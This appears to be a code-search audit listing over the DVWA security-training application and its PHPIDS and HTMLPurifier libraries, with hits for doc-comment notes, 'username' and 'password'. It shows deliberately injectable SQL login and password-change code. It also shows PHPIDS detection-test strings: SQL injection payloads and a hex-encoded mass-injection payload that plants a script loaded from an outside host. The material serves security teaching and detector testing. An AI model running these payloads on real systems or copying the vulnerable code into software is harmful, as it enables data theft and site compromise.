85-     *       exclusion for children, but we go the simpler, SGML-style
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:22 (47/95) OK | Dubious | Bad | Hide
19- * does not actually define any implementation, but offers commonly used
20- * convenience functions for subclasses.
21- * 
22: * @note The unit tests will instantiate this class for testing purposes, as
23- *       many of the utility functions require a class to be instantiated.
24- *       This means that, even though this class is not runnable, it will
25- *       not be declared abstract.
26- * 
27- * @par
28- * 
29: * @note
30- * We use tokens rather than create a DOM representation because DOM would:
31- * 
32- * @par
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:60 (48/95) OK | Dubious | Bad | Hide
57-     * a few exceptions involving special features that only DirectLex
58-     * implements.
59-     * 
60:     * @note The behavior of this class has changed, rather than accepting
61-     *       a prototype object, it now accepts a configuration object.
62-     *       To specify your own prototype, set %Core.LexerImpl to it.
63-     *       This change in behavior de-singletonizes the lexer object.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:16 (49/95) OK | Dubious | Bad | Hide
13-    
14-    /**
15-     * List of content set lookups (element => true) indexed by name.
16:     * @note This is in HTMLPurifier_HTMLDefinition->info_content_sets
17-     */
18-    public $lookup = array();
19-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:99 (50/95) OK | Dubious | Bad | Hide
96-    /**
97-     * Instantiates a ChildDef based on content_model and content_model_type
98-     * member variables in HTMLPurifier_ElementDef
99:     * @note This will also defer to modules for custom HTMLPurifier_ChildDef
100-     *       subclasses that need content set expansion
101-     * @param $def HTMLPurifier_ElementDef to have ChildDef extracted
102-     * @return HTMLPurifier_ChildDef corresponding to ElementDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/IDAccumulator.php:5 (51/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Component of HTMLPurifier_AttrContext that accumulates IDs to prevent dupes
5: * @note In Slashdot-speak, dupe means duplicate.
6: * @note The default constructor does not accept $config or $context objects:
7- *       use must use the static build() factory method to perform initialization.
8- */
9-class HTMLPurifier_IDAccumulator
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/IDAccumulator.php:43 (52/95) OK | Dubious | Bad | Hide
40-    /**
41-     * Load a list of IDs into the lookup table
42-     * @param $array_of_ids Array of IDs to load
43:     * @note This function doesn't care about duplicates
44-     */
45-    public function load($array_of_ids) {
46-        foreach ($array_of_ids as $id) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URISchemeRegistry.php:13 (53/95) OK | Dubious | Bad | Hide
10-     * Retrieve sole instance of the registry.
11-     * @param $prototype Optional prototype to overload sole instance with,
12-     *                   or bool true to reset to default registry.
13:     * @note Pass a registry object $prototype with a compatible interface and
14-     *       the function will copy it and return it all further times.
15-     */
16-    public static function instance($prototype = null) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TagTransform/Font.php:10 (54/95) OK | Dubious | Bad | Hide
7- * transforms them into their corresponding CSS attributes.  These are color,
8- * face, and size.
9- * 
10: * @note Size is an interesting case because it doesn't map cleanly to CSS.
11- *       Thanks to
12- *       http://style.cleverchimp.com/font_size_intervals/altintervals.html
13- *       for reasonable mappings.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Image.php:5 (55/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * XHTML 1.1 Image Module provides basic image embedding.
5: * @note There is specialized code for removing empty images in
6- *       HTMLPurifier_Strategy_RemoveForeignElements
7- */
8-class HTMLPurifier_HTMLModule_Image extends HTMLPurifier_HTMLModule
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Legacy.php:7 (56/95) OK | Dubious | Bad | Hide
4- * XHTML 1.1 Legacy module defines elements that were previously 
5- * deprecated.
6- * 
7: * @note Not all legacy elements have been implemented yet, which
8- *       is a bit of a reverse problem as compared to browsers! In
9- *       addition, this legacy module may implement a bit more than
10- *       mandated by XHTML 1.1.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:14 (57/95) OK | Dubious | Bad | Hide
11- * XHTML 1.1 Scripting module, defines elements that are used to contain
12- * information pertaining to executable scripts or the lack of support
13- * for executable scripts.
14: * @note This module does not contain inline scripting elements
15- */
16-class HTMLPurifier_HTMLModule_Scripting extends HTMLPurifier_HTMLModule
17-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Text.php:5 (58/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * XHTML 1.1 Text Module, defines basic text containers. Core Module.
5: * @note In the normative XML Schema specification, this module
6- *       is further abstracted into the following modules:
7- *          - Block Phrasal (address, blockquote, pre, h1, h2, h3, h4, h5, h6)
8- *          - Block Structural (div, p)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:169 (59/95) OK | Dubious | Bad | Hide
166-     * as other information defined by the fix
167-     * @param $name String name of fix
168-     * @return array(string $fix_type, array $fix_parameters)
169:     * @note $fix_parameters is type dependant, see populate() for usage
170-     *       of these parameters
171-     */
172-    public function getFixType($name) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Presentation.php:6 (60/95) OK | Dubious | Bad | Hide
3-/**
4- * XHTML 1.1 Presentation Module, defines simple presentation-related
5- * markup. Text Extension Module.
6: * @note The official XML Schema and DTD specs further divide this into
7- *       two modules:
8- *          - Block Presentation (hr)
9- *          - Inline Presentation (b, big, i, small, sub, sup, tt)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:133 (61/95) OK | Dubious | Bad | Hide
130-     * @param $overload Boolean whether or not to overload previous modules.
131-     *                  If this is not set, and you do overload a module,
132-     *                  HTML Purifier will complain with a warning.
133:     * @note This function will not call autoload, you must instantiate
134-     *       (and thus invoke) autoload outside the method.
135:     * @note If a string is passed as a module name, different variants
136-     *       will be tested in this order:
137-     *          - Check for HTMLPurifier_HTMLModule_$name
138-     *          - Check all prefixes with $name in order they were added
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:326 (62/95) OK | Dubious | Bad | Hide
323-     * @param $trusted Boolean trusted overriding parameter: set to true
324-     *                 if you want the full version of an element
325-     * @return Merged HTMLPurifier_ElementDef
326:     * @note You may notice that modules are getting iterated over twice (once
327-     *       in getElements() and once here). This
328-     *       is because 
329-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:5 (63/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * A UTF-8 specific character encoder that handles cleaning and transforming.
5: * @note All functions in this class should be static.
6- */
7-class HTMLPurifier_Encoder
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:28 (64/95) OK | Dubious | Bad | Hide
25-     * It will parse according to UTF-8 and return a valid UTF8 string, with
26-     * non-SGML codepoints excluded.
27-     * 
28:     * @note Just for reference, the non-SGML code points are 0 to 31 and
29-     *       127 to 159, inclusive.  However, we allow code points 9, 10
30-     *       and 13, which are the tab, line feed and carriage return
31-     *       respectively. 128 and above the code points map to multibyte
32-     *       UTF-8 representations.
33-     * 
34:     * @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and
35-     *       hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the
36-     *       LGPL license.  Notes on what changed are inside, but in general,
37-     *       the original code transformed UTF-8 text into an array of integer
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:202 (65/95) OK | Dubious | Bad | Hide
199-    
200-    /**
201-     * Translates a Unicode codepoint into its corresponding UTF-8 character.
202:     * @note Based on Feyd's function at
203-     *       <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
204-     *       which is in public domain.
205:     * @note While we're going to do code point parsing anyway, a good
206-     *       optimization would be to refuse to translate code points that
207-     *       are non-SGML characters.  However, this could lead to duplication.
208:     * @note This is very similar to the unichr function in
209-     *       maintenance/generate-entity-file.php (although this is superior,
210-     *       due to its sanity checks).
211-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:296 (66/95) OK | Dubious | Bad | Hide
293-    
294-    /**
295-     * Converts a string from UTF-8 based on configuration.
296:     * @note Currently, this is a lossy conversion, with unexpressable
297-     *       characters being omitted.
298-     */
299-    public static function convertFromUTF8($str, $config, $context) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:336 (67/95) OK | Dubious | Bad | Hide
333-     * @warning Adapted from MediaWiki, claiming fair use: this is a common
334-     *       algorithm. If you disagree with this license fudgery,
335-     *       implement it yourself.
336:     * @note Uses decimal numeric entities since they are best supported.
337:     * @note This is a DUMB function: it has no concept of keeping
338-     *       character entities that the projected character encoding
339-     *       can allow. We could possibly implement a smart version
340-     *       but that would require it to also know which Unicode
341-     *       codepoints the charset supported (not an easy task).
342:     * @note Sort of with cleanUTF8() but it assumes that $str is
343-     *       well-formed UTF-8
344-     */
345-    public static function convertToASCIIDumbLossless($str) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Optional.php:5 (68/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Definition that allows a set of elements, and allows no children.
5: * @note This is a hack to reuse code from HTMLPurifier_ChildDef_Required,
6- *       really, one shouldn't inherit from the other.  Only altered behavior
7- *       is to overload a returned false with an array.  Thus, it will never
8- *       return false.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/StrictBlockquote.php:15 (69/95) OK | Dubious | Bad | Hide
12-    protected $init = false;
13-    
14-    /**
15:     * @note We don't want MakeWellFormed to auto-close inline elements since
16-     *       they might be allowed.
17-     */
18-    public function getNonAutoCloseElements($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:9 (70/95) OK | Dubious | Bad | Hide
6- * @warning This class is strongly defined: that means that the class
7- *          will fail if an undefined directive is retrieved or set.
8- * 
9: * @note Many classes that could (although many times don't) use the
10- *       configuration object make it a mandatory parameter.  This is
11- *       because a configuration object should always be forwarded,
12- *       otherwise, you run the risk of missing a parameter and then
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:56 (71/95) OK | Dubious | Bad | Hide
53-    
54-    /**
55-     * Reference HTMLPurifier_ConfigSchema for value checking
56:     * @note This is public for introspective purposes. Please don't
57-     *       abuse!
58-     */
59-    public $def;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:154 (72/95) OK | Dubious | Bad | Hide
151-    /**
152-     * Returns a md5 signature of a segment of the configuration object
153-     * that uniquely identifies that particular configuration
154:     * @note Revision is handled specially and is removed from the batch
155-     *       before processing!
156-     * @param $namespace Namespace to get serial for
157-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:422 (73/95) OK | Dubious | Bad | Hide
419-    
420-    /**
421-     * Merges in configuration values from $_GET/$_POST to object. NOT STATIC.
422:     * @note Same parameters as loadArrayFromForm
423-     */
424-    public function mergeArrayFromForm($array, $index = false, $allowed = true, $mq_fix = true) {
425-         $ret = HTMLPurifier_Config::prepareArrayFromForm($array, $index, $allowed, $mq_fix, $this->def);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Doctype.php:6 (74/95) OK | Dubious | Bad | Hide
3-/**
4- * Represents a document type, contains information on which modules
5- * need to be loaded.
6: * @note This class is inspected by Printer_HTMLDefinition->renderDoctype.
7- *       If structure changes, please update that function.
8- */
9-class HTMLPurifier_Doctype
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:6 (75/95) OK | Dubious | Bad | Hide
3-/**
4- * Class responsible for generating HTMLPurifier_Language objects, managing
5- * caching and fallbacks.
6: * @note Thanks to MediaWiki for the general logic, although this version
7- *       has been entirely rewritten
8- * @todo Serialized cache for languages
9- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:70 (76/95) OK | Dubious | Bad | Hide
67-    
68-    /**
69-     * Sets up the singleton, much like a constructor
70:     * @note Prevents people from getting this outside of the singleton
71-     */
72-    public function setup() {
73-        $this->validator = new HTMLPurifier_AttrDef_Lang();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:126 (77/95) OK | Dubious | Bad | Hide
123-    
124-    /**
125-     * Returns the fallback language for language
126:     * @note Loads the original language into cache
127-     * @param $code string language code
128-     */
129-    public function getFallbackFor($code) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/VarParser.php:126 (78/95) OK | Dubious | Bad | Hide
123-    
124-    /**
125-     * Throws an inconsistency exception.
126:     * @note This should not ever be called. It would be called if we
127-     *       extend the allowed values of HTMLPurifier_VarParser without
128-     *       updating subclasses.
129-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme.php:28 (79/95) OK | Dubious | Bad | Hide
25-    
26-    /**
27-     * Validates the components of a URI
28:     * @note This implementation should be called by children if they define
29-     *       a default port, as it does port processing.
30-     * @param $uri Instance of HTMLPurifier_URI
31-     * @param $config HTMLPurifier_Config object
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:10 (80/95) OK | Dubious | Bad | Hide
7-    
8-    /**
9-     * Defaults of the directives and namespaces.
10:     * @note This shares the exact same structure as HTMLPurifier_Config::$conf
11-     */
12-    public $defaults = array();
13-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:62 (81/95) OK | Dubious | Bad | Hide
59-    
60-    /**
61-     * Internal parser that acepts a file handle.
62:     * @note While it's possible to simulate in-memory parsing by using
63-     *       custom stream wrappers, if such a use-case arises we should
64-     *       factor out the file handle into its own class.
65-     * @param $fh File handle with pointer at start of valid string-hash
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:6 (82/95) OK | Dubious | Bad | Hide
3-/**
4- * Represents an XHTML 1.1 module, with information on elements, tags
5- * and attributes.
6: * @note Even though this is technically XHTML 1.1, it is also used for
7- *       regular HTML parsing. We are using modulization as a convenient
8- *       way to represent the internals of HTMLDefinition, and our
9- *       implementation is by no means conforming and does not directly
10- *       use the normative DTDs or XML schemas.
11: * @note The public variables in a module should almost directly
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14- *       objects (include it anyway if that's the correspondence though).
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:97 (83/95) OK | Dubious | Bad | Hide
94-     * which is based off of safe HTML, to explicitly say, "This is safe," even
95-     * though there are modules which are "unsafe")
96-     * 
97:     * @note Previously, safety could be applied at an element level granularity.
98-     *       We've removed this ability, so in order to add "unsafe" elements
99-     *       or attributes, a dedicated module with this property set to false
100-     *       must be used.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:126 (84/95) OK | Dubious | Bad | Hide
123-     * @param $attr_includes What attribute collections to register to
124-     *              element?
125-     * @param $attr What unique attributes does the element define?
126:     * @note See ElementDef for in-depth descriptions of these parameters.
127-     * @return Created element definition object, so you 
128-     *         can set advanced parameters
129-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:181 (85/95) OK | Dubious | Bad | Hide
178-     * into separate content model and content model type
179-     * @param $contents Allowed children in form of:
180-     *                  "$content_model_type: $content_model"
181:     * @note If contents is an object, an array of two nulls will be
182-     *       returned, and the callee needs to take the original $contents
183-     *       and use it directly.
184-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:220 (86/95) OK | Dubious | Bad | Hide
217-     * Convenience function that generates a lookup table with boolean
218-     * true as value.
219-     * @param $list List of values to turn into a lookup
220:     * @note You can also pass an arbitrary number of arguments in
221-     *       place of the regular argument
222-     * @return Lookup array equivalent of list
223-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:143 (87/95) OK | Dubious | Bad | Hide
140-    
141-    /**
142-     * Generates attribute declarations from attribute array.
143:     * @note This does not include the leading or trailing space.
144-     * @param $assoc_array_of_attributes Attribute array
145-     * @param $element Name of element attributes are for, used to check
146-     *        attribute minimization.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:15 (88/95) OK | Dubious | Bad | Hide
12-    
13-    /**
14-     * Sets up the entity lookup table from the serialized file contents.
15:     * @note The serialized contents are versioned, but were generated
16-     *       using the maintenance script generate_entity_file.php
17-     * @warning This is not in constructor to help enforce the Singleton
18-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector.php:225 (89/95) OK | Dubious | Bad | Hide
222-    
223-    /**
224-     * Notifier that is called when an end token is processed
225:     * @note This differs from handlers in that the token is read-only
226-     * @deprecated
227-     */
228-    public function notifyEnd($token) {}
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef.php:47 (90/95) OK | Dubious | Bad | Hide
44-     * attributes specified as CDATA, it can also be applied to most CSS
45-     * values.
46-     * 
47:     * @note This method is not entirely standards compliant, as trim() removes
48-     *       more types of whitespace than specified in the spec. In practice,
49-     *       this is rarely a problem, as those extra characters usually have
50-     *       already been removed by HTMLPurifier_Encoder.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:55 (91/95) OK | Dubious | Bad | Hide
52-    
53-    /**
54-     * Loads language object with necessary info from factory cache
55:     * @note This is a lazy loader
56-     */
57-    public function load() {
58-        if ($this->_loaded) return;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/PercentEncoder.php:43 (92/95) OK | Dubious | Bad | Hide
40-    /**
41-     * Our replacement for urlencode, it encodes all non-reserved characters,
42-     * as well as any extra characters that were instructed to be preserved.
43:     * @note
44-     *      Assumes that the string has already been normalized, making any
45-     *      and all percent escape sequences valid. Percents will not be
46-     *      re-escaped, regardless of their status in $preserve
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.func.php:6 (93/95) OK | Dubious | Bad | Hide
3-/**
4- * @file
5- * Defines a function wrapper for HTML Purifier for quick use.
6: * @note ''HTMLPurifier()'' is NOT the same as ''new HTMLPurifier()''
7- */
8-
9-/**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:43 (94/95) OK | Dubious | Bad | Hide
40-/**
41- * Facade that coordinates HTML Purifier's subsystems in order to purify HTML.
42- * 
43: * @note There are several points in which configuration can be specified 
44- *       for HTML Purifier.  The precedence of these (from lowest to
45- *       highest) is as follows:
46- *          -# Instance: new HTMLPurifier($config)
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:228 (95/95) OK | Dubious | Bad | Hide
225-    }
226-    
227-    /**
228:     * @note Backwards compatibility, see instance()
229-     */
230-    public static function getInstance($prototype = null) {
231-        return HTMLPurifier::instance($prototype);

username (16) Top | Hide

./login.php:14 (1/16) OK | Dubious | Bad | Hide
12-
13-
14:	$user = $_POST[ 'username' ];
15-	$user = stripslashes( $user );
16-	$user = mysql_real_escape_string( $user );
17-
./login.php:76 (2/16) OK | Dubious | Bad | Hide
73-	
74-	<fieldset>
75-
76:			<label for=\"user\">Username</label> <input type=\"text\" class=\"loginInput\" size=\"20\" name=\"username\"><br />
77-	
78-			
79-			<label for=\"pass\">Password</label> <input type=\"password\" class=\"loginInput\" AUTOCOMPLETE=\"off\" size=\"20\" name=\"password\"><br />
./vulnerabilities/brute/index.php:44 (3/16) OK | Dubious | Bad | Hide
41-		<h2>Login</h2>
42-
43-		<form action=\"#\" method=\"GET\">
44:			Username:<br><input type=\"text\" name=\"username\"><br>
45-			Password:<br><input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password\"><br>
46-			<input type=\"submit\" value=\"Login\" name=\"Login\">
47-		</form>
./vulnerabilities/brute/source/low.php:5 (4/16) OK | Dubious | Bad | Hide
2-
3-if( isset( $_GET['Login'] ) ) {
4-
5:	$user = $_GET['username'];
6-	
7-	$pass = $_GET['password'];
8-	$pass = md5($pass);
./vulnerabilities/brute/source/high.php:5 (5/16) OK | Dubious | Bad | Hide
2-
3-if( isset( $_GET[ 'Login' ] ) ) {
4-
5:	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = stripslashes( $user );
8-	$user = mysql_real_escape_string( $user );
9-
./vulnerabilities/brute/source/medium.php:5 (6/16) OK | Dubious | Bad | Hide
2-
3-if( isset( $_GET[ 'Login' ] ) ) {
4-
5:	// Sanitise username input
6:	$user = $_GET[ 'username' ];
7-	$user = mysql_real_escape_string( $user );
8-
9-	// Sanitise password input
./external/phpids/0.6/tests/IDS/MonitorTest.php:624 (7/16) OK | Dubious | Bad | Hide
621-        $exploits[] = 'aaa\' or (1)=(1) #!asd';
622-        $exploits[] = 'aaa\' OR (1) IS NOT NULL #!asd';
623-        $exploits[] = 'a\' or 1=\'1';
624:        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626-        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
./external/phpids/0.6/tests/IDS/MonitorTest.php:861 (8/16) OK | Dubious | Bad | Hide
858-        $exploits[] = "1'^column is not null - ' ";
859-        $exploits[] = "'is\N - '1";
860-        $exploits[] = "aa' is 0 or '1";
861:        $exploits[] = "' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a";
862:        $exploits[] = "' or MATCH username AGAINST ('a* -) -+ ' IN BOOLEAN MODE); -- -a";
863-        $exploits[] = "1'*@a or '1";
864-        $exploits[] = "1'*null or '1";
865-        $exploits[] = "1'*UTC_TIME or '1";
./external/phpids/0.6/tests/IDS/MonitorTest.php:911 (9/16) OK | Dubious | Bad | Hide
908-        $exploits[] = 'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);';
909-        $exploits[] = "asaa';SELECT[asd]FROM[asd]";
910-        $exploits[] = "asd'; select [column] from users ";
911:        $exploits[] = "0x31 union select @@version,username,password from users ";
912-		$exploits[] = "1 order by if(1<2 ,uname,uid) ";
913-		$exploits[] = "1 order by ifnull(null,userid) ";
914-		$exploits[] = "2' between 1 and 3 or 0x61 like 'a";
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:85 (10/16) OK | Dubious | Bad | Hide
82-            if ($this->host === false) $this->host = null;
83-        }
84-        
85:        // validate username
86-        if (!is_null($this->userinfo)) {
87-            $encoder = new HTMLPurifier_PercentEncoder($chars_sub_delims . ':');
88-            $this->userinfo = $encoder->encode($this->userinfo);
./dvwa/includes/dvwaPage.inc.php:114 (11/16) OK | Dubious | Bad | Hide
111-
112-	$dvwaSession =& dvwaSessionGrab();
113-
114:	$dvwaSession['username'] = $pUsername;
115-
116-}
117-
./dvwa/includes/dvwaPage.inc.php:123 (12/16) OK | Dubious | Bad | Hide
120-
121-	$dvwaSession =& dvwaSessionGrab();
122-
123:	return isset( $dvwaSession['username'] );
124-
125-}
126-
./dvwa/includes/dvwaPage.inc.php:132 (13/16) OK | Dubious | Bad | Hide
129-
130-	$dvwaSession =& dvwaSessionGrab();
131-
132:	unset( $dvwaSession['username'] );
133-
134-}
135-
./dvwa/includes/dvwaPage.inc.php:147 (14/16) OK | Dubious | Bad | Hide
144-
145-	$dvwaSession =& dvwaSessionGrab();
146-
147:	return ( isset( $dvwaSession['username']) ? $dvwaSession['username'] : '') ;
148-
149-}
150-
./dvwa/includes/DBMS/PGSQL.php:46 (15/16) OK | Dubious | Bad | Hide
43-	dvwaPageReload();
44-}
45-
46:$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));";
47-
48-if( !pg_query( $create_tb ) ){
49-	dvwaMessagePush( "Table could not be created<br />SQL: " . pg_last_error() );
./dvwa/includes/DBMS/DBMS.php:45 (16/16) OK | Dubious | Bad | Hide
42- }
43- 
44- function db_login( $user,$pass ) {
45:    $login = "SELECT * FROM users WHERE username='$user' AND password='$pass';";
46-  
47-  $result = @pg_query( $login ) or die('<pre>' . pg_last_error() . '</pre>');
48-

password (42) Top | Hide

./login.php:18 (1/42) OK | Dubious | Bad | Hide
16-	$user = mysql_real_escape_string( $user );
17-
18:	$pass = $_POST[ 'password' ];
19-	$pass = stripslashes( $pass );
20-	$pass = mysql_real_escape_string( $pass );
21-	$pass = md5( $pass );
22-
23:	$qry = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';";
24-
25-	$result = @mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
26-
./login.php:79 (2/42) OK | Dubious | Bad | Hide
76-			<label for=\"user\">Username</label> <input type=\"text\" class=\"loginInput\" size=\"20\" name=\"username\"><br />
77-	
78-			
79:			<label for=\"pass\">Password</label> <input type=\"password\" class=\"loginInput\" AUTOCOMPLETE=\"off\" size=\"20\" name=\"password\"><br />
80-			
81-			
82-			<p class=\"submit\"><input type=\"submit\" value=\"Login\" name=\"Login\"></p>
./config/config.inc.php:18 (3/42) OK | Dubious | Bad | Hide
15-$_DVWA[ 'db_server' ] = 'localhost';
16-$_DVWA[ 'db_database' ] = 'dvwa';
17-$_DVWA[ 'db_user' ] = 'root';
18:$_DVWA[ 'db_password' ] = '';
19-
20-# Only needed for PGSQL
21-$_DVWA[ 'db_port' ] = '5432';
./vulnerabilities/csrf/index.php:41 (4/42) OK | Dubious | Bad | Hide
38-
39-	<div class=\"vulnerable_code_area\">
40-	
41:	<h3>Change your admin password:</h3>
42-    <br>
43-    <form action=\"#\" method=\"GET\">";
44-	
45-	if (dvwaSecurityLevelGet() == 'high'){
46:		$page[ 'body' ] .= "Current password:<br>
47:		<input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_current\"><br>";
48-	}
49-    
50:$page[ 'body' ] .= "    New password:<br>
51:    <input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_new\"><br>
52:    Confirm new password: <br>
53:    <input type=\"password\" AUTOCOMPLETE=\"off\" name=\"password_conf\">
54-    <br>
55-    <input type=\"submit\" value=\"Change\" name=\"Change\">
56-    </form>
./vulnerabilities/csrf/source/low.php:6 (5/42) OK | Dubious | Bad | Hide
3-	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_new = $_GET['password_new'];
7:		$pass_conf = $_GET['password_conf'];
8-
9-
10-		if (($pass_new == $pass_conf)){
11-			$pass_new = mysql_real_escape_string($pass_new);
12-			$pass_new = md5($pass_new);
13-
14:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
15-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
16-						
17-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:6 (6/42) OK | Dubious | Bad | Hide
3-	if (isset($_GET['Change'])) {
4-	
5-		// Turn requests into variables
6:		$pass_curr = $_GET['password_current'];
7:		$pass_new = $_GET['password_new'];
8:		$pass_conf = $_GET['password_conf'];
9-
10:		// Sanitise current password input
11-		$pass_curr = stripslashes( $pass_curr );
12-		$pass_curr = mysql_real_escape_string( $pass_curr );
13-		$pass_curr = md5( $pass_curr );
14-		
15:		// Check that the current password is correct
16:		$qry = "SELECT password FROM `users` WHERE user='admin' AND password='$pass_curr';";
17-		$result = mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );
18-
19-		if (($pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 )){
20-			$pass_new = mysql_real_escape_string($pass_new);
21-			$pass_new = md5($pass_new);
22-
23:			$insert="UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';";
24-			$result=mysql_query($insert) or die('<pre>' . mysql_error() . '</pre>' );
25-						
26-			$html .= "<pre> Password Changed </pre>";
./vulnerabilities/csrf/source/high.php:31 (7/42) OK | Dubious | Bad | Hide
28-		}
29-	
30-		else{		
31:			$html .= "<pre> Passwords did not match or current password incorrect. </pre>";			
